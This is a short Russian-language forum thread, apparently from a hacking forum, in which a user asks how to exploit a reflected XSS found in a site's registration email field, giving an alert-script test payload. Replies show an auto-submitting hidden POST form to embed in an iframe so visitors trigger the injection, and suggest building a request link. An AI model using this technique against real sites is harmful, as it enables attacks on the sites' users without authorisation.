Вопрос по xss

Discussion in 'Песочница' started by Dad69, 16 Jan 2012.

  1. Dad69

    Dad69 New Member

    Joined:
    16 Oct 2011
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Всем привет, на одной сайте нашел пассивную xss уязвимость.
    При регистрации пользователя, если в e-mail ввести зловредный код типа "><script>alert(/1/)</script>, то выскочит ошибка.
    Но понял что не хочет из моего запроса ссылка получаться.
    И как же использовать эту уязвимость если ссылка не получается?
     
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    PHP:
    <body onload="myform.submit()">
    <
    form id="myform" action="http://example.com/" method="post">
    <
    input name="email" value="XSS">
    </
    form>
    </
    body>
    Код в скрытый фрейм и на свой сайт. При переходе пользователя на страницу с фреймом, выполнится код.
    Если не понял, что я написал, гугли "XSS в POST-запросе" и "CSRF в POST-запросе".
     
  3. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Или составь свою ссылку с постзапросом.(сниффер в помощь)
    будет что-то такое - сайт.ру/скрипт.php?login=any&pass=ololo&email=XSS
     
  4. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Это будет GET запрос.
     
Loading...